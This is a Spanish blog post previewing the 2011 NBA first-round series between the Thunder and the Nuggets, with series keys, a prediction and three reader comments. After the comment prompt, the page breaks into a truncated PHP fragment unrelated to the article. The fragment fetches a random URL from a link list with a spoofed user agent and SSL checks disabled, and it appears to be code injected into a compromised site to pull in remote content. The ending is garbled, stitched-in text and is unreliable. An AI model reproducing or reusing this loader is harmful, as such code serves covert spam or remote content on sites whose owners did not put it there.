Análisis Oklahoma Thunder vs Denver Nuggets

17 de April de 2011 por TheDeerHunter

Regular: 3-1 Thunder

Thunder: 104.8 PF – 101 PC (+3.8)
Nuggets: 107.5 PF – 102.5 PC (+4.8)

Todo cambió hace apenas unas semanas. Los Nuggets resolvían una situación insostenible traspasando a Carmelo Anthony, pero también a Chauncey Billups y a cambio de un buen número de jugadores muy válidos. Los Thunder por su parte se reforzaban con decisión por dentro pero a cambio de dos piezas importantes hasta la fecha. Algunos analistas advirtieron que los Nuggets renunciaban a la actual campaña, en la que aún se encontraban razonablemente bien colocados, a la par que veían a los Thunder como nuevos candidatos al título con su movimiento. Al menos una de los dos premisas se ha demostrado exagerada.

Ambos parecen más fuertes que antes. No sabemos si hasta el punto de que alguno de los dos pueda aspirar a la gran finalísima, pero sí llegando a el momento clave de la temporada en el mejor estado de forma y los mejores resultados de todo el salvaje Oeste. Nos encontramos ante la eliminatoria estrella de toda la primera ronda.

Se trata de dos equipos tan similares como diferentes. Ambos son de lo más peligroso ofensivamente de la liga (los Nuggets son los que más puntos anotan y Thunder los 5ºs), si bien el equipo de Karl se basa en un inmejorable juego colectivo y el de Brooks en sus dos anotadores all-stars absorbiendo juego. Ambos son fuertes reboteando pero también los dos encajan muchos puntos. Que nadie se lleve a engaño. No son ninguna madre defendiendo. Simplemente su ritmo es demoníaco. Ambos cuentan con técnicos válidos y son equipos que se conocen perfectamente… o al menos se conocían bien antes de los traspasos.

A priori los favoritos son los Thunder, pero no lo van a tener fácil. Eliminatoria igualada.

Claves de la eliminatoria:

– La salud de los Nuggets: Felton, Lawson, Chandler, Gallinari, Nenê, Afflalo, Andersen, Mozgov… la lista de los que han pasado por la enfermería durante las últimas semanas en Denver da escalofríos. Si tuvieran que afrontarla así tendrían la eliminatoria absolutamente perdida. El gran arma de este equipo es precisamente el talento colectivo de una plantilla tan profunda.

– Ritmo, defensa y contraataque: ¿Están preparados estos dos equipos para el modo playoff? No será esta la eliminatoria donde puedan testearse. Se espera un ritmo alto por ambos lados. Ataques frenéticos de Denver contra contragolpes mortíferos de los Thunder. Durante el curso, la defensa de Scott Brooks ha logrado imponerse.

– Las faltas: Los Nuggets, con tal equipazo, bien podrían ignorar este factor. Sin embargo no es así. Los Thunder son un equipo que fuerza una cantidad demoledora de tiros libres, sobre todo en playoffs y en Oklahoma. Además sabe aprovecharlos eficientemente. Ceder tiros libres es algo que los Nuggets no se pueden permitir.

– Westbrook/Durant vs resto: Una de las parejas más letales del campeonato. La cuestión es si Denver tiene armas defensivas para aminorarles. Quizás sea más asequible parar al resto. Otros lo han intentado antes contra otras parejas con diferentes grados de éxito.

Pronóstico: 4-2 Thunder

Comenta

3 comentarios a esta entrada

  1. HisRoyalAirness dice:
    #1

    Creo que en toda la liga hay sólo un par de personas que puedan parar a Durant. Y aún así lo de “parar” es muy subjetivo. La combinación de estatura y agilidad hace que sea una verdadera pesadilla.
    4-2 para OKC

      Citar

  2. German dice:
    #2

    Sin dudas una gran serie para ver y espero que sea hasta el septimo partido, con los Thunder imponiendose finalmente en casa

      Citar

  3. Javijaen dice:
    #3

    4-3 para Oklahoma… Puede ser la mejor de las eliminatorias (con la de los ositos, que acaban de ganar).

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>